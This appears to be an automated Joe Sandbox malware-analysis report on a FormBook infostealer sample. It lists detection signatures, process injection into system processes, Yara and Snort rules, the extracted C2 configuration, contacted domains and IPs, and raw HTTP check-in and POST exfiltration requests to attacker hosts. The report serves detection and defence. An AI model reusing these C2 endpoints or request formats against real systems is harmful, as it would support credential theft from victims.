Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NHYGUnNN.exe

Overview

General Information

Sample Name:NHYGUnNN.exe
Analysis ID:756156
MD5:4f9c8432b57fa1aa875071de547ba947
SHA1:e1cc52fd851621743ba562a65161bfafed8e6b2b
SHA256:9f0d17930a9312b8d8dfb23119b57fed676a1bb15fc1582754ab94201651b221
Tags:exeformbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • NHYGUnNN.exe (PID: 5380 cmdline: C:\Users\user\Desktop\NHYGUnNN.exe MD5: 4F9C8432B57FA1AA875071DE547BA947)
    • RegSvcs.exe (PID: 5148 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 4844 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.needook.com/4u5a/"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x6631:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1f070:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa8cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x17e07:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x17c05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x176b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x17d07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x17e7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa49a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x168fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1dde7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1edda:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x1a0e9:$sqlite3step: 68 34 1C 7B E1
    • 0x1ac61:$sqlite3step: 68 34 1C 7B E1
    • 0x1a12b:$sqlite3text: 68 38 2A 90 C5
    • 0x1aca6:$sqlite3text: 68 38 2A 90 C5
    • 0x1a142:$sqlite3blob: 68 53 D8 7F 8C
    • 0x1acbc:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 18 entries

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      Timestamp:192.168.2.6154.209.6.24149722802829004 11/29/22-18:25:42.914102
      SID:2829004
      Source Port:49722
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: NHYGUnNN.exeReversingLabs: Detection: 27%
      Yara detected FormBook
      Source: Yara matchFile source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Machine Learning detection for sample
      Source: NHYGUnNN.exeJoe Sandbox ML: detected
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.needook.com/4u5a/"]}
      Source: NHYGUnNN.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HMMCXNXCJKFD.pdb source: NHYGUnNN.exe
      Source: Binary string: RegSvcs.pdb, source: NETSTAT.EXE, 0000000A.00000002.501502525.00000000038B3000.00000004.10000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000001.00000003.237929727.0000000001137000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.236683417.0000000000F98000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.320124356.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.318032789.00000000031D3000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BUMBUM.pdb source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp, NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000001.00000003.237929727.0000000001137000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.236683417.0000000000F98000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.320124356.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.318032789.00000000031D3000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HMMCXNXCJKFD.pdbBSJB source: NHYGUnNN.exe
      Source: Binary string: RegSvcs.pdb source: NETSTAT.EXE, 0000000A.00000002.501502525.00000000038B3000.00000004.10000000.00040000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BUMBUM.pdbBSJB source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp, NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BD2CA0 FindFirstFileW,FindNextFileW,FindClose,
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi

      Networking

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 38.55.236.89 80
      Source: C:\Windows\explorer.exeDomain query: www.darkchocolatebliss.com
      Source: C:\Windows\explorer.exeDomain query: www.marketmall.digital
      Source: C:\Windows\explorer.exeNetwork Connect: 172.67.148.132 80
      Source: C:\Windows\explorer.exeNetwork Connect: 54.38.220.85 80
      Source: C:\Windows\explorer.exeNetwork Connect: 154.209.6.241 80
      Source: C:\Windows\explorer.exeNetwork Connect: 89.31.143.1 80
      Source: C:\Windows\explorer.exeDomain query: www.canadianlocalbusiness.com
      Source: C:\Windows\explorer.exeDomain query: www.y31jaihdb6zm87.buzz
      Source: C:\Windows\explorer.exeNetwork Connect: 162.213.255.142 80
      Source: C:\Windows\explorer.exeDomain query: www.ope-cctv.com
      Source: C:\Windows\explorer.exeDomain query: www.dersameh.com
      Snort IDS alert for network traffic
      Source: TrafficSnort IDS: 2829004 ETPRO TROJAN FormBook CnC Checkin (POST) 192.168.2.6:49722 -> 154.209.6.241:80
      Uses netstat to query active network connections and open ports
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: www.needook.com/4u5a/
      Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
      Source: Joe Sandbox ViewASN Name: QSC-AG-IPXDE QSC-AG-IPXDE
      Source: global trafficHTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=PpVjBZYmN65mN/Cch5R9AL0rcoAD1LxI4sTzWlpX/jy1IrupfQnyd2YG9N8O4SbWoFYU5LvyeEtp38I885KIODFzvvn/7iZ+w1zSOWQrPDed HTTP/1.1Host: www.ope-cctv.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /4u5a/?l0GX=DO8SLO7p+ieBn2EC0oYIAc7qa4Xo4oKKhL6K9ytUp3CH+6ohEz4QzFDvrvyjA4KB81/r5tutyqTX+rvP+Yb6ZUWqEETpfEhrV3qJRCQNMeQd&GFQD=d2J0s HTTP/1.1Host: www.dersameh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=pzMeEw2CLp9onsoEnnWxz7DjwWrmiPcXMIcMx0e8RMBYp3cHCqEf8wLsuyWBJtbijuVM0Zvb5p08kUy+wXRBHzYlQdhpzNTGfYmB4954z6O2 HTTP/1.1Host: www.darkchocolatebliss.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /4u5a/?l0GX=odL+ljtDJZnnvHXGVqz6MYcHTNNFW2XRvrcwy4k99/9PUVuyA+q7lKaiZ8dF4agdsl/xXcCsqSWGiuLBWKJZJi8UVH1n7ApvhveD6637F7nt&GFQD=d2J0s HTTP/1.1Host: www.y31jaihdb6zm87.buzzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=+3a19pWtZng4d4VWOC/6zX+Mtu8c5OpbMBerEkzVlILtG/Qx1KaY9rLPGpDSvmBGoypiYd46AJSA/qrnjKpXW0Tn6YTEKB73Lei52b2L1E6m HTTP/1.1Host: www.marketmall.digitalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /4u5a/?l0GX=oAzQ4htCGi4nqSyuBtGVfUCtoVNBPGpnnjqt2pSGyg/seKLGD+qTa4VfLqEZsFdX3QB0KgbSd28tsjFwPlPYkk5JGWRtP+2k/VY6r0frt1hO&GFQD=d2J0s HTTP/1.1Host: www.canadianlocalbusiness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 89.31.143.1 89.31.143.1
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.dersameh.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.dersameh.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dersameh.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 4f 4d 55 79 49 34 48 4b 35 31 32 2d 67 55 49 7a 31 2d 55 52 64 63 28 79 52 35 48 51 7e 59 4c 4c 35 72 75 31 30 79 78 5a 6b 52 36 5f 76 35 64 77 58 51 59 4e 35 56 4c 5a 6b 66 43 4b 44 4c 75 4c 28 46 76 59 79 38 4b 33 78 72 33 55 32 38 37 33 28 36 58 61 54 56 44 39 4a 69 53 7a 62 51 55 45 64 6d 57 53 53 45 59 6a 4b 4c 68 4a 28 6e 61 47 54 67 61 49 66 65 35 64 4a 72 4b 55 73 41 68 57 56 47 76 44 4b 61 43 54 77 78 78 39 38 34 77 68 4c 53 30 69 51 37 67 37 48 31 63 69 4e 79 45 48 30 58 30 39 51 39 61 64 39 36 4e 69 68 59 77 5f 6b 74 7a 49 28 57 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: l0GX=OMUyI4HK512-gUIz1-URdc(yR5HQ~YLL5ru10yxZkR6_v5dwXQYN5VLZkfCKDLuL(FvYy8K3xr3U2873(6XaTVD9JiSzbQUEdmWSSEYjKLhJ(naGTgaIfe5dJrKUsAhWVGvDKaCTwxx984whLS0iQ7g7H1ciNyEH0X09Q9ad96NihYw_ktzI(Wo.
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.dersameh.comConnection: closeContent-Length: 1454Cache-Control: no-cacheOrigin: http://www.dersameh.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dersameh.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 4f 4d 55 79 49 34 48 4b 35 31 32 2d 68 33 51 7a 33 64 38 52 56 63 28 78 65 5a 48 51 72 49 4b 6a 35 72 69 31 30 7a 6b 55 6a 6e 4b 5f 76 50 42 77 58 79 41 4e 31 31 4c 5a 69 66 43 4f 65 62 76 51 28 46 72 2d 79 39 61 42 78 70 37 55 33 62 66 33 75 73 6a 64 59 46 44 46 4c 53 54 6c 62 51 56 4f 64 6d 47 65 53 45 55 61 4b 4c 70 4a 28 52 4f 47 57 51 61 4c 61 65 35 64 4a 72 4b 59 73 41 67 48 56 43 37 62 4b 61 71 44 33 43 35 39 28 5a 51 68 4a 7a 30 6c 42 72 68 38 62 6c 64 50 42 43 46 37 79 47 42 46 59 65 4b 2d 69 72 38 4b 6c 5a 4e 72 7e 63 62 44 68 78 61 54 7a 5f 4f 49 4e 79 6e 37 54 6f 57 4d 7e 73 51 33 6f 50 6f 4c 61 70 4f 41 33 41 36 30 6e 4f 67 6a 46 4d 57 69 72 52 4c 68 35 30 69 78 72 4b 6a 41 64 51 72 76 36 51 53 37 6a 33 51 72 53 5f 7e 5a 73 30 38 36 72 45 34 52 74 77 56 4c 7a 48 6d 4d 54 4b 7e 44 62 58 62 5f 4e 51 47 6d 69 62 37 4a 46 4e 49 55 53 47 36 39 74 48 4a 75 4d 64 63 5f 63 2d 30 61 55 6e 6b 4c 58 46 54 48 31 5a 48 61 49 6e 42 50 63 37 65 6f 55 4e 79 2d 6f 4f 34 61 6a 38 53 65 47 5f 66 6a 65 70 7a 71 69 72 65 46 6f 44 53 51 5a 31 74 76 65 43 57 71 57 6d 32 4f 69 5a 51 4b 78 5f 38 31 67 48 51 72 53 7a 43 5f 63 6a 63 4c 64 6a 46 69 62 35 41 74 55 49 7e 67 34 53 52 48 51 5a 7a 51 75 52 59 41 62 39 50 35 79 66 54 4d 61 4b 38 61 4b 73 72 69 64 78 4d 68 30 77 48 61 76 69 5a 45 5a 68 42 30 78 35 41 32 4f 70 46 66 33 6c 55 54 70 61 71 31 56 4e 36 42 38 52 34 6f 63 44 58 31 7e 74 6f 68 7a 68 4e 56 46 63 61 69 34 6e 47 78 79 32 45 62 6a 65 38 49 7e 37 48 62 31 7a 65 79 61 6f 4d 6b 43 77 5a 42 69 65 30 4c 41 69 56 63 30 74 46 76 42 53 31 47 79 67 55 2d 46 42 64 46 33 65 4c 4f 4d 2d 28 44 34 78 4f 71 70 4b 5a 5f 39 2d 42 67 73 47 79 77 64 33 57 70 7e 53 52 35 36 6b 7a 6e 56 52 4e 77 6f 44 6d 55 72 6e 50 43 48 42 31 42 7e 65 6e 4b 32 55 44 44 6c 71 32 71 62 32 42 6d 4a 51 7a 58 67 6e 35 2d 52 2d 48 55 56 50 57 6b 62 44 5a 71 49 61 6e 33 68 53 57 55 4e 62 50 55 52 39 6d 47 57 41 62 6b 37 48 55 58 4b 46 7e 36 4b 41 34 5f 41 34 5a 70 56 42 49 47 39 54 66 30 75 31 5a 4b 34 69 49 36 4f 44 49 59 39 73 48 7a 71 6a 7e 78 6a 52 36 44 4d 79 50 69 54 5a 4d 39 39 5f 63 6f 63 63 65 46 74 6e 54 58 32 31 47 35 75 5f 7e 33 6f 30 71 72 6a 57 7a 79 4b 49 52 5f 4b 54 6d 62 28 5f 66 41 79 37 32 45 7a 51 4a 43 75 44 7e 32 28 53 49 75 65 47 30 52 43 55 4c 56 41 33 65 59 7e 46 4d 6d 77 51 59 71 72 56 45 61 44 52 71 61 53 6a 77 57 44 57 28 72 76 69 67 31 4e 77 73 77 7a 65 34 34 73 50 7e 46 4e 34 4e 50 48 46 66 55 30 55 33 54 62 2d 4c 42 6a 37 78 4d 34 76 34 66 75 2d 62 36 50 63 41 7a 6b 59 34 64 50 67 48 56 52 30 72 39 68 75 71 6d 33 55 4e 66 30 69 78 4d 41 58 4a 75 7a 6
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.darkchocolatebliss.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.darkchocolatebliss.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.darkchocolatebliss.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 6b 78 6b 2d 48 45 6d 75 43 65 6c 57 71 4e 67 47 36 79 57 44 69 72 48 68 79 33 54 50 70 4d 63 69 4e 37 30 42 7e 43 65 42 52 4b 77 31 74 30 41 47 57 35 77 36 33 42 7a 51 7e 68 75 4b 4d 2d 36 30 32 65 70 42 77 49 69 43 6b 59 30 75 6a 58 61 44 67 55 67 47 47 78 4a 44 4b 75 35 38 78 4d 37 7a 54 34 4b 56 77 5f 4a 54 7e 65 61 5f 6c 47 67 50 36 69 62 4b 6f 64 64 31 76 4e 33 69 49 64 5a 35 69 52 4e 56 6a 6c 44 76 44 59 50 6c 54 6e 72 6b 4a 64 6e 5a 38 46 6a 78 68 7a 74 6e 71 5a 47 44 30 4e 61 36 58 50 6b 69 36 31 46 53 36 30 77 69 56 41 28 74 69 70 30 2e 00 00 00 00 00 00 00 00 Data Ascii: l0GX=kxk-HEmuCelWqNgG6yWDirHhy3TPpMciN70B~CeBRKw1t0AGW5w63BzQ~huKM-602epBwIiCkY0ujXaDgUgGGxJDKu58xM7zT4KVw_JT~ea_lGgP6ibKodd1vN3iIdZ5iRNVjlDvDYPlTnrkJdnZ8FjxhztnqZGD0Na6XPki61FS60wiVA(tip0.
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.darkchocolatebliss.comConnection: closeContent-Length: 1454Cache-Control: no-cacheOrigin: http://www.darkchocolatebliss.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.darkchocolatebliss.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 6b 78 6b 2d 48 45 6d 75 43 65 6c 57 6f 75 6f 47 34 54 57 44 7a 62 48 2d 73 48 54 50 77 63 63 6d 4e 37 34 42 7e 47 47 52 52 38 51 31 73 6d 34 47 58 61 49 36 36 68 7a 51 70 78 75 4f 50 4f 37 32 32 65 39 4e 77 4a 54 67 6b 61 59 75 69 30 69 44 6d 57 49 48 66 52 4a 64 64 4f 35 7a 78 4d 37 63 54 34 61 52 77 5f 4d 49 7e 61 32 5f 6c 56 59 50 72 79 62 4c 6e 39 64 31 76 4e 33 75 49 64 59 6f 69 58 6c 33 6a 6b 4c 46 43 71 48 6c 54 43 6e 6b 61 71 62 59 30 6c 69 34 28 44 73 72 73 4c 66 75 73 37 62 4f 66 2d 41 61 73 33 46 4f 36 57 46 52 51 79 37 47 33 4a 63 38 35 6a 52 69 32 67 73 52 4a 4e 6f 33 6e 61 41 5a 4f 74 6c 2d 54 42 74 44 7a 4a 66 65 42 31 34 61 44 4d 6b 37 74 79 6a 56 62 49 36 77 57 59 39 30 73 36 28 30 44 57 50 35 4a 61 6f 79 78 72 4a 76 64 65 49 30 28 4f 54 4c 46 48 34 70 44 7a 6e 34 28 32 6f 78 7a 4f 62 71 73 6b 33 49 59 36 63 45 30 76 47 78 71 39 35 33 65 4b 6f 43 41 33 4d 41 6e 75 44 36 4a 49 4a 67 6a 66 65 5f 42 4d 47 77 4b 54 72 4a 6e 38 6c 5f 36 63 49 41 6b 50 4d 70 77 43 6d 32 6e 53 75 57 7a 7a 50 30 73 47 61 77 54 4f 52 63 31 53 38 69 76 33 75 30 51 70 62 37 34 6b 6b 6a 32 67 38 39 72 58 68 32 55 75 39 48 51 49 58 6b 43 35 75 44 73 6f 7e 78 6d 59 51 54 46 4e 70 55 41 35 68 54 59 5a 63 57 79 58 41 70 4e 6e 72 5f 72 6b 38 58 63 50 66 51 70 34 34 37 6b 6e 28 71 50 32 6b 57 52 36 37 69 53 6f 76 67 77 44 6f 53 4f 35 54 34 56 54 73 4e 68 76 46 4b 6a 38 4e 34 63 71 4e 53 59 33 33 57 4a 32 4a 73 64 67 70 47 41 78 39 6a 34 38 77 37 67 51 7a 32 46 49 44 72 34 71 63 59 44 45 72 71 75 31 38 30 39 33 57 36 5a 72 6f 47 76 50 79 69 70 6b 45 42 57 68 35 32 51 78 4c 31 37 5a 64 65 4c 46 73 76 52 69 61 42 62 75 59 4a 55 5a 6e 52 56 4b 4e 5a 34 42 7e 35 51 67 58 79 57 6e 4c 79 62 2d 72 31 77 74 47 36 5a 74 70 53 4e 78 59 49 65 6d 41 42 56 7a 75 2d 66 65 4c 41 77 43 71 53 53 4b 71 52 49 37 46 67 7e 6c 50 53 59 55 4b 69 47 44 38 73 43 75 38 33 4b 30 4d 66 38 66 4f 37 38 6f 46 50 42 69 37 58 46 72 59 75 5a 4e 53 45 4b 38 7a 71 38 5f 56 50 79 78 34 47 67 67 75 52 54 43 61 77 33 4b 6f 5f 54 46 48 49 5a 59 58 58 5a 43 32 67 38 34 71 74 73 42 66 75 72 41 45 34 6e 43 38 75 48 71 62 42 36 34 78 42 38 45 30 38 77 46 6b 35 67 42 33 66 30 4a 58 71 54 38 49 71 75 51 41 78 6b 6a 6c 67 54 33 4d 6b 49 69 66 56 28 39 43 39 50 7a 44 35 32 30 7a 69 64 61 67 47 4c 4f 4d 43 61 68 56 68 64 54 47 5a 47 43 6b 35 55 76 65 76 28 57 30 76 65 59 5a 74 7e 37 74 37 61 53 57 68 30 65 51 6c 33 6e 7e 57 65 45 50 79 74 31 79 6b 32 69 74 74 5a 73 4c 61 61 77 62 4a 61 4e 30 43 4a 54 6c 46 78 44 73 53 47 50 78 6d 78 7a 47 62 6f 65 46 41 63 6b 64 6c 53 62 30 3
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.y31jaihdb6zm87.buzzConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.y31jaihdb6zm87.buzzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.y31jaihdb6zm87.buzz/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 6c 66 6a 65 6d 53 6c 4c 42 38 6e 67 6c 33 72 48 49 65 79 58 61 59 34 6d 63 63 4e 51 65 44 58 74 30 4c 59 77 79 6f 55 64 32 5f 74 54 54 6d 57 31 44 76 53 65 74 37 57 6b 55 5f 70 6a 35 72 5a 37 6e 58 7a 41 57 39 57 70 73 78 66 51 6e 4d 76 79 4a 35 51 56 4c 68 67 57 55 6b 4a 6a 37 55 64 56 6a 5f 76 33 35 4a 44 64 42 63 69 75 53 44 32 44 70 6e 66 70 31 49 70 6d 62 75 74 64 56 48 75 77 6f 5f 43 79 54 6a 78 38 39 49 4a 79 6d 62 75 39 56 57 56 31 52 61 4e 34 64 62 59 70 33 58 39 77 61 38 4f 46 42 6d 53 30 50 63 65 57 61 43 7e 51 70 33 65 50 4a 30 73 2e 00 00 00 00 00 00 00 00 Data Ascii: l0GX=lfjemSlLB8ngl3rHIeyXaY4mccNQeDXt0LYwyoUd2_tTTmW1DvSet7WkU_pj5rZ7nXzAW9WpsxfQnMvyJ5QVLhgWUkJj7UdVj_v35JDdBciuSD2Dpnfp1IpmbutdVHuwo_CyTjx89IJymbu9VWV1RaN4dbYp3X9wa8OFBmS0PceWaC~Qp3ePJ0s.
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.y31jaihdb6zm87.buzzConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.y31jaihdb6zm87.buzzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.y31jaihdb6zm87.buzz/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 6c 66 6a 65 6d 53 6c 4c 42 38 6e 67 6c 33 72 48 49 65 79 58 61 59 34 6d 63 63 4e 51 65 44 58 74 30 4c 59 77 79 6f 55 64 32 5f 74 54 54 6d 57 31 44 76 53 65 74 37 57 6b 55 5f 70 6a 35 72 5a 37 6e 58 7a 41 57 39 57 70 73 78 66 51 6e 4d 76 79 4a 35 51 56 4c 68 67 57 55 6b 4a 6a 37 55 64 56 6a 5f 76 33 35 4a 44 64 42 63 69 75 53 44 32 44 70 6e 66 70 31 49 70 6d 62 75 74 64 56 48 75 77 6f 5f 43 79 54 6a 78 38 39 49 4a 79 6d 62 75 39 56 57 56 31 52 61 4e 34 64 62 59 70 33 58 39 77 61 38 4f 46 42 6d 53 30 50 63 65 57 61 43 7e 51 70 33 65 50 4a 30 73 2e 00 00 00 00 00 00 00 00 Data Ascii: l0GX=lfjemSlLB8ngl3rHIeyXaY4mccNQeDXt0LYwyoUd2_tTTmW1DvSet7WkU_pj5rZ7nXzAW9WpsxfQnMvyJ5QVLhgWUkJj7UdVj_v35JDdBciuSD2Dpnfp1IpmbutdVHuwo_CyTjx89IJymbu9VWV1RaN4dbYp3X9wa8OFBmS0PceWaC~Qp3ePJ0s.
